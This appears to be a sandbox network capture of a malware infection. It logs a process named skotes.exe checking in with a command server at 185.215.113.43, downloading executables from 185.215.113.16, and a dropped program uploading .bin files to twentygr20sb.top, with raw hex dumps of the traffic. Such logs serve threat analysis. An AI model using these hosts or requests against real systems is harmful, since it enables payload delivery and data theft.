Dec 16, 2024 11:03:40.926294088 CET	1236	IN	Data Raw: 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 Data Ascii: QRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{\|}~HH:mm:ssdddd, MMMM dd, yyyyMM/dd/yyPMAMDecemberNove
Dec 16, 2024 11:03:40.926330090 CET	1120	IN	Data Raw: 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 69 72 74 75 61 6c 20 64 69 73 70 6c 61 63 65 6d 65 6e 74 20 6d Data Ascii: r destructor iterator'`eh vector constructor iterator'`virtual displacement map'`vector vbase constructor iterator'`vector destructor iterator'`vector constructor iterator'`scalar deleting destructor'`default constructor clo
Dec 16, 2024 11:03:40.926423073 CET	1236	IN	Data Raw: 00 00 00 43 4f 4e 4f 55 54 24 00 31 23 51 4e 41 4e 00 00 31 23 49 4e 46 00 00 00 31 23 49 4e 44 00 00 00 31 23 53 4e 41 4e 00 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 6c 61 74 69 78 6f 77 61 6d 65 67 6f 6e 6f 6d 61 66 6f 63 75 62 61 67 Data Ascii: CONOUT$1#QNAN1#INF1#IND1#SNANbad allocationlatixowamegonomafocubagebekernel32.dllkernel32.dll00HE
Dec 16, 2024 11:03:40.926460028 CET	1236	IN	Data Raw: 75 f8 83 3d ec 0b 46 00 0c 89 75 e8 75 18 8d 4d d0 51 6a 00 6a 00 6a 00 ff 15 b4 10 40 00 6a 00 ff 15 a0 10 40 00 8b d6 c1 ea 05 89 55 f8 8b 45 e0 01 45 f8 8b 4d ec 8b c6 c1 e0 04 03 45 d4 8d 14 31 33 c2 33 45 f8 89 45 ec 8b 45 ec 29 45 f4 81 c1 Data Ascii: u=FuuMQjjj@j@UEEME133EEE)EGamM_EMU_^P[]UQF\|FSVWv`=\@D@E=FYu4jjjjjjjjj(@jj<@jjjj@VP
Dec 16, 2024 11:03:41.045537949 CET	1236	IN	Data Raw: c7 85 88 fe ff ff fc 69 50 23 c7 45 c4 54 f7 48 4f c7 85 4c ff ff ff c0 99 a9 2e c7 85 90 fe ff ff 08 fa ba 2b c7 45 f0 f8 7b 12 29 c7 45 a8 06 81 b9 04 c7 45 8c 22 ca da 48 c7 85 60 fe ff ff 18 f1 c2 6a c7 85 28 ff ff ff 9c df f9 37 c7 85 30 ff Data Ascii: iP#ETHOL.+E{)EE"H`j(709B^E]E0Zn;l^WhJ8VEd52S0at D3TAW*@OBE>oLLH'ED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49878	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:44.322350979 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 30 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016043001&unit=246122658369
Dec 16, 2024 11:03:45.657419920 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49881	185.215.113.16	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:45.781280041 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 16, 2024 11:03:47.123459101 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:46 GMT Content-Type: application/octet-stream Content-Length: 1889280 Last-Modified: Mon, 16 Dec 2024 09:29:29 GMT Connection: keep-alive ETag: "675ff2f9-1cd400" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 b0 00 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 4b 00 00 04 00 00 d2 3a 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gJ@K:@T0h 1 H@.rsrc X@.idata 0\@ @+@^@zvacajztP0N`@acgxgepqJ@.taggant0J"@
Dec 16, 2024 11:03:47.123486996 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:47.123503923 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:47.123648882 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:47.123665094 CET	1236	IN	Data Raw: 74 dd 70 8d 1f bc ed 40 45 86 cb 60 25 a6 9d 69 fa f6 14 65 97 5d f2 ed d7 39 47 bd b7 f7 07 08 6c cd 96 f8 21 91 ef 1f a7 3d 07 66 2f e5 d1 ee 1d 76 ee 9f 8f c4 07 02 ef 46 cd 1c d6 ae d1 09 31 8b 20 0f ab ff 3a 2f ea 10 90 24 b2 d8 39 e4 e4 e1 Data Ascii: tp@E`%ie]9Gl!=f/vF1 :/$9M)n7PG-#J9Ao9^ty.U8\|7{(;]nD8<81v7m2@{P#t%<HEkU3gg6s>cI1M-(1
Dec 16, 2024 11:03:47.123680115 CET	1236	IN	Data Raw: 27 47 ad 20 e6 97 10 8c 97 78 08 a2 01 6f 55 c7 ca 95 ec 00 54 d9 2d 35 aa 97 4c 64 63 c1 0d ec 6f 73 b4 fb e9 89 5b 74 13 15 cd 60 b6 fe ef 5e ba 95 cd 2f ae 59 d3 4b 79 45 99 87 7c ef 62 1e d6 3d a8 32 89 83 96 82 d6 e9 f4 1c f0 8d cd e8 c7 25 Data Ascii: 'G xoUT-5Ldcos[t`^/YKyE\|b=2%>zlifx:?Ak]@\|I'W%&hCFY[%!GP'KuRL.yvxf96z-ndw\|<uRj
Dec 16, 2024 11:03:47.123697996 CET	1236	IN	Data Raw: 65 17 86 d5 a5 31 f8 8c e4 ec 19 65 bf 3d c6 c4 d6 35 45 67 26 56 44 c2 6f 60 e5 2a a7 7c 4a c7 e8 02 86 e0 c5 f8 7b 19 41 6c 19 e6 1c b9 26 16 b2 30 d0 d2 56 e6 77 ec 9d 84 83 fd 9f 55 ae 95 7e 15 74 ef e5 b5 43 67 c3 e7 4a dd be 58 89 a7 ab 8a Data Ascii: e1e=5Eg&VDo`*\|J{Al&0VwU~tCgJX>>Y&r_\|y!vP>1Q.,B.g@EfW]ug61,\|ui.?[}_e mw(fka=.^K-=V,<1EIL
Dec 16, 2024 11:03:47.123852015 CET	1236	IN	Data Raw: b8 93 27 22 ae 0e 1d ca 2a 7e 33 e3 fd 74 7b ae 8e 4b f9 3f ef fc 0b 22 61 36 a1 f1 39 09 25 8e f2 92 28 9a e9 bd bf 40 02 81 15 7c f7 56 12 61 f0 e1 ed d4 8b 5f 8e 00 85 7f d0 f9 cd ed 2b c5 f6 d5 f8 df af ea dd 69 2c 2b 3a cc b9 a5 cd 4e e4 83 Data Ascii: '"~3t{K?"a69%(@\|Va_+i,+:N["7`!aol3%A6P<3C%9eu0HjbC;6-i8Fv`7fE@wJUyY^~yMq\| G-Q^RXO5"-UGz
Dec 16, 2024 11:03:47.123867989 CET	1236	IN	Data Raw: 96 66 8b 4c e6 83 61 30 e8 3b 00 6a f7 57 d1 b5 bf af 30 10 76 9e 0e 5c 36 89 0d d3 df 46 06 10 2f 89 0b a6 6d ba fb e4 af ad a5 02 da 9f 45 67 71 db 03 61 86 07 86 85 29 f5 c6 ed d2 2e 9e 70 eb b1 ba 5b 8a 72 89 24 b0 86 89 69 f1 9b d3 f9 0e cf Data Ascii: fLa0;jW0v\6F/mEgqa).p[r$it,kQ7_'nD0l%U1QJn13n[Z4!Qo9Bn#1T$`x_#:J?9<e>moD8mIC7>NN0A^D_XMl]
Dec 16, 2024 11:03:47.123883963 CET	1236	IN	Data Raw: f6 75 cc 5f 48 5f c7 29 aa 6c bb a5 52 44 59 29 27 60 31 fc 35 2c e9 f5 29 fc 30 1c e8 06 a3 26 e6 e6 c6 75 27 5e 7f d9 8b 36 39 55 a1 16 44 32 a8 96 a3 5c 38 c5 3d 5c b0 f5 2d ac e6 87 fd ed 2e b5 9e db 84 1b 26 0e ca 85 5e 1d f6 df 30 f8 fe c9 Data Ascii: u_H_)lRDY)'`15,)0&u'^69UD2\8=\-.&^0C-9mX&Z>Oc~&G<h(?[T'\rv-rjY3=4`PC"rxA:`\|EF6+Bur%km]>b+!Ng
Dec 16, 2024 11:03:47.243705034 CET	1236	IN	Data Raw: 33 c3 19 01 f6 c6 d3 ec 60 59 d7 d1 37 7c fe 51 d4 85 0c 9f f2 7b 48 00 2e 94 50 f2 96 af 68 f5 f9 b7 68 e6 97 8b 80 20 b0 68 88 e3 de 15 87 f0 8d 20 3d d5 9d 25 bd e8 90 9a f0 38 3c fd 47 54 6d f9 bf 42 ff b5 03 f6 a7 33 87 6e af f4 1d 0b fa a0 Data Ascii: 3`Y7\|Q{H.Phh h =%8<GTmB3nLjY_v+N/@b_E;5!gRX{q4pwB;gJJNLF7{$+$z,N4%+e4x4hc( A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49902	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:52.825439930 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 30 34 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016044001&unit=246122658369
Dec 16, 2024 11:03:54.167139053 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49906	185.215.113.16	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:54.408170938 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 16, 2024 11:03:55.736587048 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:03:55 GMT Content-Type: application/octet-stream Content-Length: 1854976 Last-Modified: Mon, 16 Dec 2024 09:29:36 GMT Connection: keep-alive ETag: "675ff300-1c4e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 6b 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6b 00 00 04 00 00 82 2e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*0k@`k.@M$a$$ $h@.rsrc$x@.idata $z@ +$\|@qlmsectipP~@gcgddbmv k&@.taggant00k",@
Dec 16, 2024 11:03:55.736675978 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:55.736696005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:55.736913919 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:03:55.736929893 CET	1236	IN	Data Raw: 77 b0 9f 00 b9 68 ba 9d 79 75 fb 14 87 2d 5e be 34 49 22 b4 b8 25 69 84 60 2d 9a e3 54 a9 92 af 48 e7 8a 96 38 df 82 be 93 83 75 42 9a 0f 61 90 b0 0d 73 94 ac 9d 62 d0 84 2d 56 6d 1f 3e 4a 5d 75 31 3e 6c 6d ab 92 94 77 55 66 ec 5c 4d 22 95 3a 0e Data Ascii: whyu-^4I"%i`-TH8uBasb-Vm>J]u1>lmwUf\M":<e&Ue{]keHp3?U^;]"sHiVTh\|`^h\|va>"m-=S<@Ryk Dx;({qGQV@{PFi+B).9(t&l@>iZG[
Dec 16, 2024 11:03:55.736944914 CET	1236	IN	Data Raw: 4a 05 61 58 56 1d 97 9d 75 2e a5 f1 e0 62 f7 05 aa 45 de 4d 47 0d 2e 85 ff 0c 3e 28 46 3d d1 65 ec 87 23 53 3d 8c 01 c5 9b 80 3a 16 11 84 22 c0 63 c0 23 2f 1e 64 bd c4 3f c8 28 7e a7 2f 70 07 fd 76 5f 34 bd 9c 23 e3 a4 9e 60 0f 85 8d 22 01 c6 2c Data Ascii: JaXVu.bEMG.>(F=e#S=:"c#/d?(~/pv_4#`",W9A }Y;S6je<oOA@9"(!x:,uq,TJ\|G.9^`l/j_gjp_}FUuC[>%UOpb~^/+
Dec 16, 2024 11:03:55.736962080 CET	1236	IN	Data Raw: 76 78 8a 00 4b a5 3b 2c bd 37 28 8d 45 46 db 7e 4a c9 2b 14 76 96 12 9a 86 67 d2 8d f8 2d 3e 1c 8d 07 38 22 fe 75 ea 92 10 a9 3c 94 c0 6a e6 d5 42 13 a9 95 3c 45 ae b0 a5 39 cd 99 16 e9 32 9c 7e 4d 30 90 f0 96 42 19 4b ef 72 b4 4a 35 6a 00 61 ae Data Ascii: vxK;,7(EF~J+vg->8"u<jB<E92~M0BKrJ5jab}SLKJ*uvK<g_/4Nb\8:F5:@1 #tGB="U9+fQq;JX\P}Z66BrD9\+J"T~D9^<Wu-U,DgtC
Dec 16, 2024 11:03:55.737149954 CET	1236	IN	Data Raw: 3c 60 30 b9 d6 51 02 09 be cc 22 98 d7 ac 06 c7 84 3b 2a e0 bc b6 65 81 3d 95 22 92 b4 6a 7a 84 a2 a0 bb 03 45 36 5a 95 d8 a9 5c 90 5d 87 8b 90 ec 3b 3b 48 3d 3d a5 0c 81 b9 83 a4 14 3b 5c 78 46 d5 a7 a5 6a 80 22 94 61 c2 42 de 84 79 8b 9c d8 67 Data Ascii: <`0Q";e="jzE6Z\];;H==;\xFj"aBygjJqtg$}#J+ugfM5eiV9G9;by--\5z#t8S)=}>ES?<;F8bM3p9Uy:^u0gr5g2YM>0H7Fi+xGXL;\\Fe
Dec 16, 2024 11:03:55.737166882 CET	1236	IN	Data Raw: 18 2e db 0a 47 7a 2b 90 78 d3 1e 92 44 61 5e 28 bd 6d 59 c6 0b 2d 42 b8 c8 59 30 9d d8 3a 43 03 bf 65 30 8c 84 a9 f2 09 7d 38 63 81 a8 85 37 92 d5 2d 36 06 bf 22 25 03 fe aa 89 ec 3e 3e 92 d7 d4 3e 5f 60 47 c2 9a 01 4b ad 62 ab c0 b9 e8 92 bc b5 Data Ascii: .Gz+xDa^(mY-BY0:Ce0}8c7-6"%>>>_`GKb^W/`0,GwjS0l=^/UbGZ8gMa<w`gZx-l\m0MvVB0=U^Pbe+PtoI KXfX *k>DcBMG^z>0=g>YZ0LdK"
Dec 16, 2024 11:03:55.737183094 CET	1236	IN	Data Raw: a9 3b 2a 00 b9 21 a6 c1 3a 27 c1 fa 5c b9 33 be d0 36 96 06 47 12 1c ae 42 c9 9e 92 e4 47 12 ff 63 fc 1b 15 01 e1 5b 8d 94 b2 1e 02 6c 3a 30 64 f6 26 4c bc 08 a9 46 58 57 79 9f be df 47 30 60 46 11 23 64 d6 67 af 84 47 b5 c5 fc 4a 2d 67 04 59 b2 Data Ascii: ;*!:'\36GBGc[l:0d&LFXWyG0`F#dgGJ-gYHGugp3<jZJ\IjOgmJ<$QT9FT;I=de\ihg(^0?.MFTR[BKgE]t;w^g\;0<gFi?p`K\6xI
Dec 16, 2024 11:03:55.856966972 CET	1236	IN	Data Raw: 55 2f 80 53 23 7e 35 d4 50 f7 a8 cf 7e 7d a2 c9 85 d9 66 9a 60 7b f1 6a bf 53 39 40 ca 5b 3c d0 41 44 2e d2 c1 13 3c 8b 79 9b 4b ba 22 fb 69 6a 46 16 3b 46 8d 43 7e 4c 85 bb 3b a0 49 aa 36 04 71 09 cf ce c2 66 e2 38 3d cc ef c0 e8 4f 7e 14 29 2e Data Ascii: U/S#~5P~}f`{jS9@[<AD.<yK"ijF;FC~L;I6qf8=O~).#56H*;Dy\|5Upc2q4vK,\|``T2A%`9Gjj}0()My0A;ev3+?d%dD2PREk1_l&X.Oo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49922	141.8.192.141	80	4476	C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:03:59.026432037 CET	646	OUT	POST /v1/upload.php HTTP/1.1 Host: twentygr20sb.top Accept: / Content-Length: 464 Content-Type: multipart/form-data; boundary=------------------------dk4OrBOxmT6PfLcSdEGcwN Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 6b 34 4f 72 42 4f 78 6d 54 36 50 66 4c 63 53 64 45 47 63 77 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 6f 78 75 6d 69 6b 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2f 3d 03 d1 21 00 80 74 7f 4b a0 82 2f e8 6a 5a ef 71 45 26 1c 7e f7 88 a7 95 38 c1 34 61 1b b2 fa 7e 37 cc 76 2f 4c 15 a5 d0 77 0e 7e 71 ce 7c e3 48 f8 72 dd f8 f9 d9 65 1b 02 d1 99 cc 8b 6e 20 81 fb 96 82 02 09 4a 5e 0b c4 59 30 61 1a f2 79 e9 27 ef b2 c4 67 91 36 8d ba 26 c7 98 d6 7d c6 b8 8a 7a 86 48 fd 66 ed 08 33 bd 4b ef 19 9b 80 da a4 5b 29 3e f4 c4 ce cb 34 6a ac e0 7a f4 7a a7 46 a7 9e 66 5a 6e 22 4c 89 10 92 26 c4 40 2f ff 4b 2f 82 71 d8 b5 d6 3f 26 9c b7 ef b8 9a b6 cf 7d a7 9b 6f 2d 5d 02 3f 90 52 e7 b7 31 e1 [TRUNCATED] Data Ascii: --------------------------dk4OrBOxmT6PfLcSdEGcwNContent-Disposition: form-data; name="file"; filename="Moxumiku.bin"Content-Type: application/octet-stream/=!tK/jZqE&~84a~7v/Lw~q\|Hren J^Y0ay'g6&}zHf3K[)>4jzzFfZn"L&@/K/q?&}o-]?R1v"QyKO8%L');#kfr9ZC:j)aJns^`J7;~?s4--------------------------dk4OrBOxmT6PfLcSdEGcwN--
Dec 16, 2024 11:04:00.375488997 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Mon, 16 Dec 2024 10:04:00 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 29 x-ratelimit-reset: 1734345241 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49931	141.8.192.141	80	4476	C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:01.908854008 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: twentygr20sb.top Accept: / Content-Length: 70692 Content-Type: multipart/form-data; boundary=------------------------27DrIuilFi10g9UY2Cq1cK Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 44 72 49 75 69 6c 46 69 31 30 67 39 55 59 32 43 71 31 63 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 61 6d 6f 71 61 78 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a f7 5d 7a 53 ec 76 c4 c7 f8 74 2b b0 f4 42 8b 83 da 1b 21 d4 1b 36 bf 65 bc e2 1d 12 ea 51 32 6d 24 0b 0b 9b f6 40 9a 93 83 67 b2 3d f8 5e 08 6c a5 c5 1c a1 76 fb 83 24 fb ea 8f 29 ed 02 a1 c9 a0 2a 99 a1 22 a3 37 ce 40 2e ff e6 12 cf 31 84 86 8b 7a b7 70 0a 00 d5 ed 30 53 fe a2 23 bb 05 a0 d3 9e 06 02 9c 51 df 1a 46 88 a9 e5 69 0d 79 63 11 92 37 df 4a cc 7d e9 f7 9e 53 b2 6a e1 45 91 6e 66 51 fd c6 d7 45 ba 80 8d d1 be b6 1a 2f 56 dd 28 f2 87 bf 16 cd 73 8f 67 5b 40 be 50 df 26 10 1a 58 76 0a 46 5d 5b ec 41 11 00 0d 57 3c [TRUNCATED] Data Ascii: --------------------------27DrIuilFi10g9UY2Cq1cKContent-Disposition: form-data; name="file"; filename="Xamoqaxe.bin"Content-Type: application/octet-stream]zSvt+B!6eQ2m$@g=^lv$)*"7@.1zp0S#QFiyc7J}SjEnfQE/V(sg[@P&XvF][AW<C?$';4/lDkySdhfgx~yjmL)#X=a}X\"An^t[>47j2[v[Oabi<7vU4J8gDLU7'6ok^wm99e3%PX'xW0dEQVT}0:3_V@UeQZ[M`5kdL~F$~1RP,i/RwJJi5(;Ah)V({u^2t#wg.J Msi4$v$:~xChU-J'a"v,"6[_h^tUs80<1Ur<XYdo?k:hYu86`NgQ;Cm&WpX\+-X]S2^e[oT7\|D7(;!3GO&<hTLdC1F=?6!Gdy_Q+Slt,j=>^Y9#DI_9x0~\|v,L~QB [TRUNCATED]
Dec 16, 2024 11:04:02.029069901 CET	12360	OUT	Data Raw: d1 0c f8 86 51 57 d8 4c b5 0a 82 84 cd 73 68 9b ad 4f ab dc 7c e1 3a fd 8e 75 ad bf 4a 6a a3 02 ee 54 03 6c bd e6 27 94 9a 1b 83 78 87 37 a2 26 d9 c2 8f 17 ab 66 e3 fa 6a db c2 18 33 ac 39 6c 5c b0 af f1 43 94 b5 de 5c d8 97 1a a1 35 f4 e6 eb 4d Data Ascii: QWLshO\|:uJjTl'x7&fj39l\C\5M79P*QDHFgNF=m\|?@t\eTgv4HSE2@5=_qbVl b^vS9t6pLv6U ]&dmVb.\E3 `.
Dec 16, 2024 11:04:02.029124022 CET	7416	OUT	Data Raw: 47 96 9a 75 84 ca e0 37 e0 74 f3 5e 61 89 45 0c 7c 8e af bf 91 41 01 68 fb db 0d 3b 23 d5 6b 2b 77 ee bf b6 5a 85 d9 28 c4 29 cb f3 02 90 38 3c dd 89 5b 73 05 be 52 6d f3 60 a5 38 e9 ce d5 8a 29 02 af 6d 65 11 aa 51 b2 ff a8 21 2d 30 7b 68 be 56 Data Ascii: Gu7t^aE\|Ah;#k+wZ()8<[sRm`8)meQ!-0{hV'{#_e&b2Zw<QfE#,Z7+JM%9'~;}1hPP!N%+Dfk71"hTrKHWEfL\|(F$q5nx%Xl
Dec 16, 2024 11:04:02.029201984 CET	2472	OUT	Data Raw: 05 1f dd 95 c2 83 a8 8e 9a 07 a1 d4 18 08 2d 71 29 4b 60 40 1f 15 0d 49 8e a8 91 0f 6c 0c fc d0 ca 05 6c f0 1d ff fe fd bf 41 13 1d f8 69 8f 65 c5 88 bf 34 af 6d e6 4b a0 c9 ca dc b5 55 50 92 83 95 c8 63 9b 36 05 16 fe 99 c9 e1 dd 97 51 99 4c 40 Data Ascii: -q)K`@IllAie4mKUPc6QL@&-Fnh,q6v?MhwN>u+L!J4;Sf.:/l0 4owe}WmLU1nIl3r]zI#@B3%WbGJ-
